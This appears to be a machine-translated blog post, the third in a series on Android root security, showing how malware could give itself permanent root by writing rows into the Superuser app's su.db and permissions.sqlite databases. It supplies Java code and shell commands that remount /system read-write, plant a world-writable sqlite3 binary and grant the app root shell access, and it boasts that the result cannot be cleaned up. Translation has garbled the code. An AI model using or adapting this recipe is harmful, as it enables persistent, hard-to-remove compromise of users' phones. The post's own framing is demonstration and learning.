Security issues after android mobile phone root (3)

First, open the re manager. At this time, the re manager Requests the root permission. The superuser will pop up a prompt asking whether the user permits
Before clicking "allow", select "remember" and then allow.
This step is used to obtain the data that should be inserted in the superuser database when the application obtains permanent root permission.

Then we export the database
/Data/com. noshufou. android. su/databases there are two databases that need attention.
Su. db
Permissions. sqlite
The following uses permissions. sqlite as an example to describe the table structure:

Then let's see how the virus modifies the data.

Virus only needs to care about several fields
Uid, package name, application name, exec_uid = 0, exec_cmd =/system/bin/sh, allow = 1
There is no doubt about how the virus gets its own package name and Application name.
ActivityManager. RunningAppProcessInfo contains uid Information
The following code obtains the uid of the current application.

[Java]
Public static int getUid (Context context, String packageName ){
ActivityManager activityManager = (ActivityManager) context. getSystemService (Context. ACTIVITY_SERVICE );
List <ActivityManager. RunningAppProcessInfo> runningAppProcesses = activityManager. getRunningAppProcesses ();
Int size = runningAppProcesses. size ();
ActivityManager. RunningAppProcessInfo runningAppProcessInfo = null;
For (int I = 0; I <size; I ++ ){
RunningAppProcessInfo = runningAppProcesses. get (I );
If (packageName. equals (runningAppProcessInfo. processName )){
Return runningAppProcessInfo. uid;
}
}
Return-1;
}
Well, this table has been done, and su. db is almost the same as this, so it will not be demonstrated.

The last question is how to modify the database in the mobile phone. Obviously, we use sqlite3, but some mobile phones do not have this problem, so the virus may be bound by itself, then copy to system/bin or system/xbin.
Where does sqlite3 come from? Yes .. For example, you can generate a copy from the simulator pull.

Okay, all done.
Finally, we will take two steps.
1. Prepare the sqlite3 file, just in case

[Java]
PrepareButton. setOnClickListener (new View. OnClickListener (){
Public void onClick (View v ){
File dataFolder = getFilesDir ();
File sqlite = new File (dataFolder. getAbsolutePath () + "/sqlite3 ");
CopyFile ("db/sqlite3", sqlite, mResources );
}
});

2. Apply for the root permission. Once successful, modify the database.

[Java]
String sqlUpdateSu = "insert into apps (uid, package, name, exec_uid, exec_cmd, allow, dirty)" +
"Values (\" "+ uid +" \ ", \" "+ packageName +" \ ", \" "+ name +" \ ", 0, \ "/system/bin/sh \", 1, 0 )";
String sqlInsertPermissions = "insert into apps (uid, package, name, exec_uid, exec_cmd, allow)" +
"Values (\" "+ uid +" \ ", \" "+ packageName +" \ ", \" "+ name +" \ ", \" 0 \", \ "/system/bin/sh \", \ "1 \")";
 
String [] commands = {"busybox mount-o remount, rw/system"
, "Ls/system/bin/sqlite3 | ls/system/xbin/sqlite3 | busybox cp/data/" + packageName + "/files/sqlite3/system/xbin/ sqlite3 & chmod 777/system/xbin/sqlite3"
, "Busybox rm/data/" + packageName + "/files/sqlite3"
, "Sqlite3/data/com. noshufou. android. su/databases/su. db'" + sqlUpdateSu + "'"
, "Sqlite3/data/com. noshufou. android. su/databases/permissions. sqlite" + sqlInsertPermissions + "'"};
Run

From now on, the virus is out of your control and cannot be cleaned up.

Conclusion
This blog is only used for demonstration, so it is not strict.
For example, before using superuser for the first time, its database tables may not be created, so some SQL operations may fail.
I don't plan to write a complete virus, so some people will want to do something unclean. Learning and communication only